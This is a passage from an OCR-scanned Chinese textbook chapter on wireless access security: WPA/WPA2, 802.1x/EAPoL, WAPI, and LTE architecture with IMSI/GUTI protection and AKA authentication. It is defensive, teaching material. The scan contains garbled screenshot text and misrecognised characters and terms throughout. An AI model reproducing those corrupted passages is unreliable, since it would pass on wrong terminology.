。 WPA-PSK( 预 先 共享 密 钥 WiFi 保护 访问 )。 又 称 为 个 人 模式 ,适用 于 个 人 或 普通 家 
庭 网 络 , 使 用 预先 共享 密 钥 ,每 个 用 户 都 用 相同 的 密 钥 , 密 钥 设 置 的 密码 越 长 ,安全 
性 越 高 。WPA-PSK 只 能 使 用 TKIP 加 密 方式 。 
。 WPA2(WPA 第 二 版 )。 是 WPA 的 增强 型 版 本 ,与 WPA 相 比 ,WPA2 新 增 了 支持 
AES 的 加 密 方式 。 
。 WPA2-PSK(WPA-PSK 第 二 版 )。 适 用 于 个 人 或 普通 家 庭 网 络 , 使 用 预先 共享 密 
钥 , 支 持 TKIP 和 AES 两 种 加 密 方式 。 
中 间 层 为 IEEE 802. 1x 接口 访问 机 制 ,该 机 制 实现 合法 用 户 对 无 线 网 络 访问 的 认证 、 
授权 和 动态 密 钥 管 理 功能 。 
底层 包括 3 种 协议 : 临时 密 钥 完整 性 协议 (Temporal Key Integrity Protocol, TKIP)、 
计数 器 模式 密码 块 链 消息 认证 码 协议 (Counter mode with Cipher-block chaining Message 
authentication code Protocol, CCMP)、 无 线 健壮 安全 认证 协议 (Wireless Robust 
Authenticated Protocol, WRAP) ,该 层 协议 可 实现 信息 通信 的 机 密 性 和 完整 性 。 
WPA 采用 的 加 密 算法 有 两 种 : TKIP 和 AES(Advanced Encryption Standard, 高 级 加 
密 标准 ,负责 处 理 无 线 安全 问题 的 加 密 部 分 )。 其 中 TKIP 将 初始 向 量 扩 展 到 48 位 ,并 建立 
了 相关 的 序列 规则 ,与 128 位 的 密 钥 共同 对 数据 进行 加 密 , 其 抗 攻击 能 力 比 WEP 显著 
加 强 。 
WPA 在 保证 数据 完整 性 方面 比 采 用 CRC 校 验 码 的 WEP 有 了 很 大 的 改进 , 它 采用 信 
息 完整 性 编码 (Message Integrity Code,MIC) ,也 称 为 Michael 码 。WPA 使 用 的 MIC 中 包 
含 了 帧 计数 器 ,可 以 避免 回放 攻击 。 
WPA2 是 WiFi 联盟 验证 的 IEEE 802. 11i 标准 的 认证 形式 。 在 WPA2 中 ,Michael 码 
由 公认 安全 的 CCMP 所 取代 。 
图 7.12 显示 了 PSK 模式 下 AP 的 WPA/WPA2 的 密 钥 设置 。 
图 7.13 显示 了 在 连接 AP 时 输入 密 钥 的 界面 。 
PSK 模式 的 每 个 使 用 者 必须 输入 密 钥 才能 接 人 网 络 ,而 密 钥 可 以 是 8 一 63 个 ASCII 字 
符 ,或 是 64 个 十 六 进 制 数字 (256b) 。 用 户 可 以 自己 决定 是 否 需 要 把 密 钥 存在 计算 机 里 ,以 
省 去 重复 输入 的 麻烦 ,但 密 钥 一 定 要 存在 WiFi 的 接 人 点 中 。 
在 WPA 及 WPA2 的 企业 版 中 ,可 以 与 利用 IEEE 802. 1x 和 扩展 认证 协议 (Extensible 
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设置 向 导 - 无 线 设置 
本 向 导 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 以 及 无 贱 安全 。 
无 各 状态 : 元 E 国 
Ssm iv2002 
全 EE 
模式 : lilban nixed 国 | 
频段 带宽 : 部 六 
无 线 安全 选项 : 


为 保障 网 络 安全 ,强烈 推荐 开局 无 线 安全 ， 并 使 用 WPA-PSK/WEAZ-FSK AES 加 复方 
式 。 


〇 趟 开启 无 线 安全 
© WPA-PSK/WPA2-PSK 
PSE : T 
《8-63 个 ASCII 码 字符 或 8-64 个 十 六 进 制 字 符 》 














〇 不 修改 无 线 安 全 设置 
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7.12 PSK 模式 下 AP 的 WPA/WPA2 密 钥 设置 
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网 络 密 钥 多 ); 


确认 网 络 密 钥 


























7.13” 密 钥 输 入 界面 


Authentication Protocol,， EAP) 的 认证 服务 器 连接 ,认证 服务 器 上 保存 用 户 证 书 。EAP 是 
一 个 认证 框架 ,允许 用 户 和 网 络 接 入 服务 器 协商 所 希望 的 认证 机 制 。 这 些 机 制 称 为 EAP 方 
法 ,现在 大 约 有 40 种 不 同 的 方法 。 无线 网 络 中 常用 的 方法 包括 EAP-TLS (EAP for 
Transport Layer Security ,传输 层 安全 的 扩展 认证 协议 )、EAP-SIM( 将 SIM 卡 作 为 密 钥 用 
于 认证 的 EAP) 、.EAP-AKA(EAP for UMTS Authentication and Key Agreement, 通 用 移 
动 通信 系统 认证 和 密 钥 协商 机 制 的 扩展 认证 协议 )、PEAP (Protected Extensible 
Authentication Protocol, 受 保护 的 扩展 认证 协议 )、LEAP(Light Extensible Authentication 
Protocol, 轻 量 级 的 扩展 认证 协议 ) 和 EAP-TTLS(EAP for Tunneled Transport Layer 
Security, 隧 道 传 输 层 安全 的 扩展 认证 协议 ) 等 。 当 EAP 被 基于 IEEE 802. 1x 的 网 络 接 入 
设备 调用 时 ,EAP 方法 可 以 提供 一 个 安全 认证 机 制 ,并 在 用 户 和 网 络 接 入 服务 器 之 间 协 商 
一 个 安全 的 PMK (Pairwise Master Key, 成 对 主 密 钥 )。 该 PMK 可 以 用 于 使 用 TKIP 和 
AES 加 密 的 无 线 会 话 。 这 种 功能 可 以 实现 有 效 的 认证 控制 以 及 与 已 有 信息 系统 的 集成 。 

在 WPA 模式 下 ,需要 用 到 IEEE 802. 1x。 下 面 介绍 一 下 IEEE 802. 1x 的 认证 技术 。 

IEEE 802. 1x 基于 端口 对 用 户 的 接 人 进行 控制 ,也 可 以 用 在 WiFi 网 络 。 最 初 的 IEEE 
802. 1x 需要 在 交换 机 上 安装 IEEE 802. 1x 服务 器 软件 ,在 用 户 端 安装 客户 软件 ,IEEE 802. 1x 
协议 使 得 用 户 的 接 入 可 以 直接 由 接 入 交换 机 进行 控制 。 
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IEEE 802. 1x 协议 是 一 个 基于 客户 /服务 器 的 访问 控制 和 认证 协议 ,其 核心 是 EAPoL 
(Extensible Authentication Protocol over LAN, 基 于 局 域 网 的 可 扩展 认证 协议 )。IEEE 
802. 1x 可 以 限制 未 经 授权 的 用 户 /设备 通过 接 入 端口 (access port) 访 问 LAN/WLAN。 在 
认证 通过 之 前 ,IEEE 802. 1x 只 允许 EAPoL 的 帧 通过 交换 机 端口 ; 认证 通过 以 后 ,正常 的 
数据 帧 才 可 以 顺利 地 通过 以 太 网 端口 。 

IEEE 802. 1x 协议 的 端口 访问 实体 包含 3 部 分 : 

。 请 求 者 。 被 认证 的 用 户 / 设 备 , 必 须 运行 符合 IEEE 802. 1x 客户 端 标 准 的 软件 ,微软 

的 Windows 操作 系统 具有 该 软件 。 

。 认 证 者 。 对 接 入 用 户 / 设 备 进 行 认证 的 交换 机 等 接 入 设备 ,根据 客户 端 当前 的 认证 

状态 ,控制 其 与 网 络 的 连接 状态 。 

。 认证 服务 器 。 接 受 认证 者 的 请 求 , 对 请 求 访问 网 络 资源 的 用 户 /设备 进行 实际 认证 

功能 的 设备 。 认 证 服务 器 通常 为 前 面 所 提 到 的 RADIUS 服务 器 ,保存 了 用 户 名 及 
密码 ,以 及 相应 的 授权 信息 。 认 证 服务 器 还 负责 管理 由 认证 者 发 来 的 审计 数据 。 微 
软 的 Windows Server 操作 系统 自 带 RADIUS 服务 器 组 件 。 

EAPoL 的 认证 过 程 如 下 : 

(1) 客户 端 程序 发 出 请 求 认证 的 数据 帧 给 交换 机 ,启动 一 次 认证 过 程 。 

(2) 交换 机 收 到 请 求 认 证 的 数据 帧 后 ,发 出 请 求 数据 帧 ,要 求 客 户 端 程序 传送 用 户 名 
信息 。 

(3) 客户 端 程序 将 用 户 名 信息 通过 数据 帧 发 给 交换 机 。 交 换 机 将 客户 端 发 来 的 数据 帧 
封包 后 发 给 认证 服务 器 。 

(4) 认证 服务 器 收 到 用 户 名 信息 后 ,查询 数据 库 , 找 到 该 用 户 名 对 应 的 密码 信息 。 然 
后 ,认证 服务 器 随机 生成 一 个 密 钥 ,对 密码 进行 加 密 。 

(5) 认证 服务 器 将 KK 发 给 交换 机 ,由 交换 机 发 给 客户 端 程序 。 

(6) 客户 端 程序 收 到 K 后 ,用 天 对 自己 的 密码 进行 加 密 , 并 通过 交换 机 发 给 认证 服 
务 器 。 

(7) 认证 服务 器 将 收 到 的 加 密 后 的 密码 与 自己 加 密 后 的 密码 进行 对 比 ,如 果 相同 , 则 认 
为 该 用 户 为 合法 用 户 ,反馈 认证 通过 的 消息 ,并 向 交换 机 发 出 打开 端口 的 指令 ,允许 用 户 的 
业务 流通 过 端口 访问 网 络 。 否 则 ,反馈 认证 失败 的 消息 ,并 保持 交换 机 端口 的 关闭 状态 ,只 
允许 认证 信息 通过 而 不 允许 业务 数据 通过 。 

不 过 ,并 不 能 指望 WPA 解决 所 有 的 安全 问题 。 例 如 ,在 公共 接 人 方面 ,WPA 与 WEP 
相 比 就 没有 太 多 的 改进 。 

7.4.3.5 WAPI 安 全 技术 

我 国 2003 年 颁布 了 WAPICWireless LAN Authentication and Privacy Infrastructure， 
无 线 局 域 网 鉴别 和 保密 基础 结构 ) ,目前 已 公告 实施 的 两 个 强制 性 国家 标准 是 GB 15629. 
11 一 2003 和 GB 15629. 1102 一 2003。WAPI 是 一 套 无 线 局 域 网 的 安全 标准 ,这 套 安全 标准 
是 我 国 自 主创 新 并 拥有 知识 产权 的 标准 。 

WAPI 以 公 钥 基础 设施 (PKD) 架 构 为 基础 ,全 新 定义 了 WLAN 实体 认证 和 数据 保密 通 
信安 全 基础 架构 。 这 种 安全 机 制 由 无 线 局 域 网 保密 基础 设施 (WLAN Privacy 
Infrastructure,; WPT) 和 无 线 局 域 网 鉴 权 基础 设施 (WLAN Authentication Infrastructure， 
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WAD 两 部 分 组 成 ,分 别 用 于 加 密 传输 数据 和 鉴别 用 户 身份 。 

其 中 数据 帧 由 WPI 进行 加 解密 处 理 。WPI 的 主要 功能 如 下 : 

。 WLAN 设备 的 密 钥 协商 .访问 控制 . 链 路 验证 和 身份 鉴别 。 

。 传输 数据 和 数字 证 书 的 加 解密 和 用 户 信息 的 加 密 保 护 。 

WAI 可 以 实现 如 下 功能 : 

。 无 线 接 入 点 和 无 线 用 户 之 间 的 双向 鉴 权 认证 ,使 整个 认证 过 程 方便 操作 。 

。 认证 服务 单元 扩展 方便 ,可 以 支持 用 户 的 异地 接 入 。 

。 客户 端 支 持 多 证 书 , 方 便 用 户 实现 异地 漫游 。 

WAI 具 有 鉴别 机 制 更 加 安全 、 密 钥 管 理 技术 更 加 灵活 、 用 户 易 集中 管理 等 优点 ,能 够 满 
足 更 多 用 户 和 更 复杂 的 安全 需求 。 

WAI 的 认证 交互 过 程 与 IEEE 802. 1x 较为 相似 。 由 于 WAI 中 对 STA 和 AP 进行 了 
双向 认证 ,因此 对 于 采用 伪 AP 的 攻击 方式 具有 很 强 的 抵御 能 力 。 

通过 WAI 和 WPI 两 部 分 的 有 机 结合 ,WAPI 能 为 用 户 的 WLAN 系统 提供 全 面 的 安全 
保护 。WAPI 加 密 技术 被 无 偿 转让 给 了 联想 、 华 为 等 在 内 的 多 个 国内 厂商 。 

7.4.3.6 其 他 

在 电信 运营 商 的 公众 热点 场合 ,为 了 确保 不 同 无 线 工作 站 之 间 的 数据 流 隔 离 ,无 线 接 人 
点 AP 可 以 采用 二 层 数据 隔离 来 确保 用 户 数据 的 安全 。 

目前 已 广泛 应 用 于 广域网 络 及 远程 接 和 人 等 领域 的 VPN 安全 技术 也 可 用 于 无 线 局 域 
网 。VPN 主要 采用 DES、3DES 等 加 密 技 术 来 保障 数据 传输 的 安全 。 对 于 安全 性 要 求 更 高 
的 用 户 ,将 现 有 的 VPN 安全 技术 与 IEEE 802. 11 安全 技术 结合 起 来 ,是 目前 较为 理想 的 无 
线 局 域 网 络 的 安全 解决 方案 之 一 。 

另外 ,还 可 以 采用 入 侵 检测 技术 和 安全 审计 技术 来 提高 WLAN 的 安全 性 。 入 侵 检测 
技术 能 够 及 时 采集 .传输 以 及 处 理 数据 ,同时 控制 网 络 , 找 出 网 络 故 障 , 确 保 无 线 网 络 能 够 处 
于 安全 的 运行 状态 。 通 过 入 侵 检测 技术 ,可 以 让 受害 主机 所 在 的 网 络 管理 员 掌握 发 起 恶意 
攻击 的 数据 包 的 实际 源头 ,从 而 尽快 让 网 络 恢复 正常 的 功能 ,并 且 阻 止 可 能 再 次 出 现 的 攻击 
行为 ,有 时 候 其 至 能 够 抓获 攻击 者 。 现 阶段 ,比较 常用 的 追踪 方法 包括 路 由 追踪 方法 、IP 追 
踪 方 法 等 。 

安全 审计 技术 是 用 来 审计 移动 用 户 的 实际 网 络 访问 行为 以 及 访问 的 具体 网 络 数据 , 利 
用 内 部 控制 手段 有 效 治理 系统 。 和 入 侵 检 测 相 比 ,安全 审计 技术 不 要 求 严格 的 实时 性 ,所 以 
能 够 分 析 海 量 历史 数据 ,同时 采用 的 方法 也 能 够 更 复杂 ,更 精细 。 通 常 网 络 安全 审计 系统 可 
以 找 出 的 攻击 种 类 显著 多 于 入 侵 检 测 系统 .实际 误 报 率 也 相对 较 低 。 


7.5 蜂窝 移动 通信 接 人 安全 


7.5.1 概述 


1973 年 ,美国 电报 电话 公司 (AT&T) 发 明了 蜂窝 通信 (cellular communications)。 这 
种 技术 是 指 通信 基站 采用 蜂窝 无 线 组 网 方式 (如 图 7. 14 所 示 , 这 种 方式 可 以 在 相同 投入 的 
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情况 下 得 到 最 大 的 覆盖 面积 ) ,将 终端 (手机 ) 和 网 络 设备 通过 无 线 信道 连接 起 来 ,实现 在 移 
动 中 相互 通信 。 

几 个 月 后 ,美国 摩托 罗拉 公司 发 明了 第 一 部 手机 ,虽然 相当 笨重 ,通话 时 间 只 有 35min， 
但 是 标志 着 人 类 从 此 进入 了 一 个 无 线 通信 的 时 代 。 





7.14 蜂窝 通信 的 区 域 覆 盖 


移动 蜂窝 接 入 目前 包括 5 代 : 第 1 代 模 拟 系统 (如 AMPS、TACS 等 ) .第 2 代 (GSM、 
DAMPS 等 ) 和 2.5 代 (GPRS 等 ) .第 三 代 (3G) .第 四 代 (4G) 以 及 第 五 代 (5G)。 目 前 正在 积 
极 推进 的 是 4G ,正在 积极 研究 的 是 5G。4G 是 能 够 传输 高 质量 视频 .图 像 .音频 等 多 媒体 数 
据 的 技术 产品 ,能 够 满足 几乎 所 有 用 户 对 于 无 线 服务 的 要 求 。 另 外 ,用 户 还 可 以 根据 自身 的 
需求 定制 所 需 的 服务 。4G 是 以 正 交 频 分 复 用 (OFDM) 为 技术 核心 的 ,具有 更 高 的 信号 覆盖 
范围 ,能 够 提高 小 区 边缘 的 比特 率 , 同 时 具有 更 好 的 抗 噪声 性 能 及 抗 多 径 干 扰 的 能 力 。 
国际 电信 联盟 (ITU) 目 前 确定 的 4G 技术 标准 主要 有 以 下 4 种 : LTE、LTE-Advanced、 
Wireless MAN(WiMax) 和 Wireless MAN-Advanced。 
。 LTE(Long Term Evolution ,长 期 演进 ) 项 目 是 3G 的 演进 ,能 够 提供 下 行 100Mb/s 
及 上 行 50Mb/s 的 速率 。 目 前 的 WCDMA( 中 国联 通商 用 ) TD-SCDMA( 中 国 移动 
商用 ) .CDMA2000( 中 国电 信 商 用 ) 均 能 够 直接 向 LTE 演进 ,所 以 这 个 4G 标准 获得 
了 运营 商 的 广泛 支持 ,也 被 认为 是 4G 标准 的 主流 。 
。 LTE-Advanced 是 LTE 的 升级 ,简称 LTE-A ,能 够 提供 下 行 1Gb/s, 上 行 500Mb/s 
的 峰值 速率 。 
。 WiMax(World-wide Interoperability for Microwave Access, 全 球 微波 互联 接 入 ) 由 
IEEE 组 织 制 定 , 规 范 为 IEEE 802. 16。WiMax 最 早 的 定位 是 取代 WiFi, 但 后 来 实 
际 的 定位 比较 像 LTE, 可 以 提供 终端 使 用 者 任意 上 网 的 连接 。WiMax 可 提供 最 高 
70Mb/s 的 接 入 速率 ,上 且 WiMax 的 无 线 传输 距离 高 于 其 他 无 线 技术 ,但 WiMax 对 
高 速 情况 下 的 网 络 间 无 颖 切换 支持 较 差 。 
。 WirelessMAN-Advanced 是 WiMax 的 升级 , 即 IEEE 802. 16m 标准 , 它 最 高 可 以 提 
供 1Gb/s 无 线 传输 速率 ,兼容 未 来 的 LTE 无 线 网 络 。 
LTE 定义 了 LTE FDD(Frequency Division Duplexing, 频 分 双 工 ) 和 LTE TDDCTime 
Division Duplexing, 时 分 双 工 , 亦 称 TD-LTE) 两 种 模式 ,两 种 模式 间 只 存在 较 小 的 差异 , 特 
别 是 MAC 与 IP 层 结构 完全 一 致 。 其 中 TD-LTE 是 由 我 国 主导 的 。 
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。 FDD 模式 的 特点 是 通信 系统 在 分 离 的 两 个 独立 无 线 信 道上 分 别 进行 接收 (下 行 ) 和 
发 送 ( 上 行 ) 数 据 , 上 下 行 信道 频率 范围 之 间 间 隔 有 一 定 的 频谱 (如 190MHz), 用 来 
分 离 接收 和 发 送信 道 ,使 之 不 产生 相互 干扰 。 

该 模式 在 支持 对 称 业务 时 ,可 以 实现 充分 利用 上 、 下 行 的 频谱 ,但 在 传输 非 对 称 的 分 组 
交换 业务 时 ,频谱 利用 率 则 大 大 降低 (一 般 上 行 频 谱 无 法 充分 利用 ) ,在 这 一 点 上 ,TDD 模式 
有 着 无 法 比拟 的 优势 。 

。 TDD 模式 也 就 是 时 分 双 工 (同步 半 双 工 , 如 蓝牙 通信 ), 只 需要 一 个 信道 ,工作 时 将 

上 下 行 数据 在 不 同 的 时 间 段 内 交替 收发 ,交替 的 频率 非常 高 ,所 以 不 会 影响 收发 的 
连续 性 。 因 为 发 射 机 和 接收 机 不 会 同时 操作 ,它们 之 间 不 可 能 产生 信号 干扰 。 


7.5.2 LTE 系统 架构 


4G 的 核心 网 是 一 个 基于 全 IP 的 网 络 , 可 以 提供 端 到 端的 IP 业务 ,实现 不 同 网 络 间 的 
无 颖 互联 ,能 同 已 有 的 核心 网 和 PSTN 兼容 ,以 及 基于 IP 的 网 络 维护 管理 .基于 IP 的 网 络 
资源 控制 .基于 IP 的 应 用 服务 等 。 

核心 网 具有 开放 的 结构 ,能 允许 各 种 空中 接口 接 入 核心 网 。 同 时 核心 网 能 把 业务 .控制 
和 传输 等 分 开 。 采 用 IP 后 ,最 大 的 优点 是 所 采用 的 无 线 接 人 方式 和 协议 与 核心 网 络 协议 是 
分 离 独 立 的 ,因此 在 设计 核心 网 络 时 具有 很 大 的 灵活 性 ,不 需要 考虑 无 线 接 人 方式 和 协议 。 

LTE 系统 可 以 简单 地 看 成 由 核心 网 (EPC)、 基 站 (e-NodeB, 简 称 eNB) 和 用 户 设备 
(User Equipment,UE)3 部 分 组 成 ,如 图 7.15 所 示 。 
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7.15 LTE 的 系统 主体 架构 


EPS(Evolved Packet System, 演 进 的 分 组 系统 ) 的 核心 是 EPC(Evolved Packet Core， 
演进 的 分 组 核心 ) ,主要 管理 用 户 接 入 等 业务 操作 ,以 及 收发 和 处 理 IP 报 文 。 
EPC 包括 以 下 几 部 分 : 
。 S-GW(Serving Gateway, 服 务 网 关 ) 负 责 连 接 e-NodeB, 实 现 用 户 面 的 数据 加 密 、 路 
由 和 数据 转发 等 功能 。 
。 P-GW(Public Data Network Gateway,PDN 网 关 ) 负 责 SGW 与 Internet 等 网 络 之 
间 的 数据 业务 转发 ,从 而 提供 承载 控制 . 计 费 .地 址 分 配 等 功能 。 
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。 MME(Mobility Management Entity ,移动 管理 实体 ) 是 信 令 处 理 网 元 。 主 要 负责 管 
理 控 制 用 户 接 入 ,包括 鉴 权 控制 ,安全 加 密 、 用 户 全 球 唯一 临时 标识 的 分 配 、 跟 踪 区 
列表 管理 .2G/3G 与 EPS 之 间 安 全 参数 以 及 QoS 参数 的 转换 等 。 正 常 的 IP 数据 包 
不 需要 经 过 MME。 

。 HSS(Home Subscriber Server, 归 属 用 户 服务 器 ) 主 要 用 于 存储 并 管理 用 户 签约 数 
据 , 包 括 UE 的 位 置信 息 、 鉴 权 信息 、 路 由 信息 等 。 

。 SGSN(Service GPRS Supporting Node, 服 务 GPRS 支持 节点 ) 是 2G/3G 接 入 的 控 
制 面 网 元 ,相当 于 网 关 ,LTE 架构 通过 SGSN 实现 2G/3G 用 户 的 接 入 。 

。 e-NodeB(Evolved NodeB ,演进 的 NodeB, 即 演进 的 基站 ) 是 E-UTRAN (Evolved 
UTRAN ,演进 的 无 线 接 入 网 ) 的 实体 网 元 ,为 终端 的 接 入 提供 无 线 资源 ,负责 用 户 
报 文 的 收发 。 

其 中 ,e-NodeB 是 由 3G 系统 中 的 NodeB 和 RNC(Radio Network Controller, 无 线 网 络 
控制 器 ,负责 移动 性 管理 .呼叫 处 理 、 链 路 管理 和 移交 机 制 等 ) 两 个 节点 演进 而 来 的 ,具有 
NodeB 的 接 入 功能 和 传统 接 入 网 中 RNC 的 大 部 分 功能 。 由 于 取消 了 RNC 节点 ,实现 了 所 
谓 的 扁平 化 网 络 结构 ,简化 了 网 络 的 设计 ,4G 网 络 的 结构 更 趋 近 于 互联 网 结构 。 


7.5.3 4G 安全 威胁 


1， 移动 终端 上 的 安全 威胁 

移动 终端 在 4G 系统 中 面临 着 以 下 安全 威胁 : 

(1) 移动 终端 硬件 平台 不 安全 性 。 

移动 终端 硬件 平台 的 不 安全 性 主要 体现 在 以 下 几 个 方面 : 

。 移动 终端 硬件 平台 常常 缺乏 完整 性 保护 验证 机 制 , 导 致 平台 中 各 个 模块 的 固件 容易 

被 攻击 者 算 改 。 
"终端 内 部 各 个 接口 缺乏 机 密 性 和 完整 性 保护 ,导致 在 此 之 上 传递 的 信息 容易 被 攻击 
者 窃听 或 算 改 。 

。 现 有 移动 平台 缺乏 完善 的 访问 控制 机 制 ,信息 容易 被 非法 访问 和 窃取 。 

(2) 操作 系统 的 不 安全 性 。 

移动 终端 使 用 不 同类 型 的 操作 系统 ,并 非 所 有 的 移动 操作 系统 都 能 够 提供 安全 性 的 保 
证 , 且 可 能 存在 许多 公开 的 漏洞 。 

(3) 无 线 应 用 的 不 安全 性 。 

当前 的 移动 终端 支持 越 来 越 多 的 无 线 应 用 ,如 基于 无 线 网 络 的 电子 商务 .电子 邮件 等 ， 
此 类 应 用 本 身 所 固有 的 安全 隐患 以 及 相应 实现 程序 自身 的 漏洞 都 将 给 计算 能 力 、 存 储 能 力 
有 限 的 无 线 终端 带 来 更 大 的 安全 威胁 ,同时 这 些 无 线 应 用 也 增加 了 移动 终端 感染 病毒 、 木 马 
和 蠕虫 的 渠道 。 

(4) 传统 防 病毒 软件 需要 适应 移动 环境 。 

传统 防 病毒 软件 的 体积 将 随 着 病毒 种 类 的 增加 而 不 断 增 大 ,并 不 适合 计算 能 力 ,存储 能 
力 以 及 电池 容量 有 限 的 移动 终端 。 

2. 移动 网 络 上 的 安全 威胁 


由 于 无 线 网 络 、Internet 和 构造 复杂 的 4G 系统 的 迅猛 发 展 , 导 致 无 线 或 者 有 线 链 路 开 
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始 面临 更 大 的 安全 隐患 。 例 如 : 
。 某 些 攻 击 者 的 窃听 、 拦 截 、 算 改 以 及 伪造 链 路 上 的 数据 等 行为 ,都 严重 威胁 到 4G 系 
统 的 安全 性 。 
*。 4G 的 容错 性 有 待 提升 。 
。 一 些 运 营 商 的 诈骗 行为 将 会 更 加 明显 或 者 频繁 ,他 们 可 能 会 借助 服务 网 络 恶 意 扣 取 
使 用 者 的 接 入 费用 等 。 


7.5.4 4G 接 入 安全 


4G 系统 采用 单一 的 ,全球 范 围 的 蜂窝 核心 网 ,采用 全 数字 、 全 IP 技术 ,其 核心 网 能 够 支 
持 不 同 的 接 入 方式 ,如 IEEE 802. 11、2G/3G 等 ,同时 每 个 用 户 设备 拥有 唯一 可 识别 的 号 
码 ,通过 分 层 结构 实现 异 构 系 统 间 的 互 操作 。 这 种 结构 使 得 多 种 业务 能 透明 地 与 IP 核心 网 
连接 ,具有 较 好 的 通用 性 和 可 扩展 性 ,但 是 对 安全 性 也 提出 了 更 高 的 要 求 。 
7.5.4.1 接 入 安全 要 求 
4G 无 线 互联 网 安全 接 人 技术 的 特点 和 要 求 表现 为 以 下 4 个 方面 : 
。 用 户 信 息 保 护 。 安 全 接 人 技术 对 用 户 的 位 置 与 身份 信息 以 及 其 他 个 人 信息 予以 保 
护 , 对 身份 信息 进行 加 密 ,实现 抗 跟踪 性 。 
。 实体 认证 。 认 证 的 过 程 主要 包括 两 个 方面 ,对 用 户 的 认证 与 对 网 络 的 认证 , 即 双向 
认证 机 制 。 
。 机密 性 特点 。 通 过 密 钥 协 商 、 加 密 算 法 等 保证 用 户 信息 的 机 密 性 。 
。 完整 性 特点 。 包 括 信 令 数据 的 完整 性 以 及 用 户 数据 的 完整 性 。 
7.5.4.2 用 户 永久 身份 的 保护 
当 用 户 设 备 (UE) 开 机 时 ,需要 向 当前 网 络 进行 登记 ,网 络 将 要 求 用 户 提供 永久 身 
份 一 一 IMSI(International Mobile Subscriber Identity, 国 际 移 动用 户 识 别 码 ) 来 标识 用 户 身 
份 。 该 过 程 如 图 7. 16 所 示 。 





UE e-NodeB 

















MME | 





用 户 身 份 请 求 


用 户 身份 响应 











图 7.16 永久 身份 标识 IMSI 的 识别 机 制 


值得 注意 的 是 ,在 该 过 程 中 ,用 户 永久 身份 标识 IMSI 是 采用 明文 方式 在 空中 接口 上 传 
递 的 ,因此 IMSI 可 能 在 该 过 程 中 被 泄露 。 一 旦 用 户 的 IMSI 被 泄露 ,将 会 产生 一 定 的 威胁 ， 
例如 可 能 导致 用 户 的 身份 信息 ,业务 信息 、 位 置信 息 等 重要 信息 被 非法 获取 ,甚至 手机 卡 被 
复制 (还 需要 其 他 一 些 信 息 ) 等 。 

为 了 达到 保护 用 户 身份 信息 的 目的 ,减少 用 户 永久 身份 标识 暴露 的 时 间 , 从 2G 移动 通 
信 系统 开始 , 3GPP 就 规定 了 在 通信 过 程 中 使 用 临时 身份 标识 (Temporary Mobile 
Subscriber Identity,TMSI) 来 蔡 代 永久 身份 信息 的 相关 内 容 。 
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在 4G 系统 中 ,采用 全 球 唯一 临时 标识 (Global Unique Temporary Identity,GUTI) 作 
为 用 户 的 临时 身份 。GUTI 是 由 当地 的 MME 分 配给 用 户 的 , 仅 在 当地 覆盖 范围 内 有 效 。 
GUTI 的 分 配 过 程 如 图 7. 17 所 示 。 





UE e-NodeB 

















MME | 





GUTI 分 配 命令 


GUTI 分 配 完成 











7.17 GUTI 分 配 过 程 


GUTI 的 分 配 过 程 是 由 MME 发 起 的 ,过 程 如 下 : 

(1) MME 向 UE 发 布 一 对 新 的 临时 用 户 身份 GUTI/TAI, 用 以 在 无 线 链 路 上 标识 用 
户 身 份 ,其 中 TAI(Tracking Area Identity, 跟 踪 区 域 标识 ) 用 于 标识 用 户 当 前 所 处 区 域 。 
GUTI 的 生成 是 随机 的 、 不 可 预测 的 ,并 未 建立 起 与 用 户 IMSI 的 关联 。 

(2) 用 户 收 到 新 的 GUTI/TAI 后 ,需要 撤销 原 GUTI 与 IMSI 的 关联 关系 ,并 建立 起 新 
的 GUTI 与 IMSI 的 关联 关系 ,然后 向 MME 发 送 GUTI 分配 完成 的 消息 。 

(3) 一 旦 GUTI 分 配 完成 ,UE 即使 用 GUTI 进行 后 续 的 通信 过 程 。 

7.5.4.3 ”4G 的 信 令 安全 

4G 的 信 令 完整 性 保护 机 制 是 从 3G 开始 就 引入 的 安全 机 制 , 用 于 防止 空中 接口 上 传输 
的 信 令 遭 到 恶意 自 改 。 

完整 性 保护 机 制 的 思想 是 : 根据 数据 传输 中 信 令 数据 的 内 容 , 使 用 特定 的 数据 完整 性 
保护 算法 进行 计算 得 出 检验 信息 ,将 检验 信息 加 入 到 信 令 中 的 完整 性 保护 域 ,以 便 接收 端 通 
过 对 完整 性 保护 域 的 检查 来 确认 该 信 令 是 否 合法 。 

通过 该 机 制 ,可 以 有 效 避 人 免 来 自 攻击 者 对 空中 接口 上 传递 的 信 令 的 算 改 。 需 要 指出 的 
是 , 信 令 完整 性 保护 只 保持 对 控制 面 的 保护 ,而 对 用 户 面 的 数据 并 不 提供 保护 。 

信 令 在 受到 完整 性 保护 的 同时 ,大 部 分 信 令 还 受到 加 密 算法 的 保护 。 同 时 ,部 分 用 户 数 
据 由 于 可 能 涉及 用 户 的 隐私 信息 ,不 适宜 采用 明文 传递 ,因此 ,用 户 数据 也 可 以 使 用 加 密 算 
法 的 保护 。 但 需要 指出 的 是 ,协议 中 所 规定 的 加 密 算 法 是 可 选项 , 信 令 和 用 户 数据 是 允许 以 
明文 的 方式 在 空中 接口 上 传输 的 。 

7.5.4.4 接 入 认证 

从 3G 系统 开始 ,移动 通信 系统 就 开始 采用 了 双向 鉴 权 的 方式 ,为 用 户 和 网 络 提供 双向 
的 身份 认证 ,确保 通信 双方 (用 户 和 网 络 ) 实 体 的 真实 性 和 可 靠 性 ,防止 第 三 方 的 恶意 攻击 。 
而 密 钥 协商 机 制 则 为 通信 双方 提供 了 加 密 方 式 的 选择 途径 ,以 确保 通信 双方 均 可 实现 对 通 
信 内 容 的 加 密 ,保护 业务 数据 。 

为 了 实现 系统 的 平滑 升级 ,4G 通信 网 络 的 双向 鉴 权 和 密 钥 协 商机 制 是 在 3G 通信 网 络 
的 AKA(Authentication Key Agreement, 认 证 与 密 钥 协商 ) 机 制 基础 上 改进 而 来 的 。AKA 
认证 具有 安全 性 高 .灵活 性 好 、 便 于 对 用 户 进行 集中 管理 等 特点 。 

AKA 认证 是 基于 USIM(Universal Subscriber Identity Module, 通 用 用 户 标 识 模块 ,也 
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称 为 “升级 的 SIM”) 卡 的 。USIM 卡 支持 2G/3G/4G 通信 网 络 , 除 能 够 支持 多 应 用 之 外 ,还 
在 安全 性 方面 对 算法 进行 了 升级 ,并 增加 了 对 网 络 的 认证 功能 ,这 种 双向 认证 可 以 有 效 地 防 
止 黑 客 对 卡片 的 攻击 。 

4G 的 USIM 卡 如 图 7. 18 所 示 。 

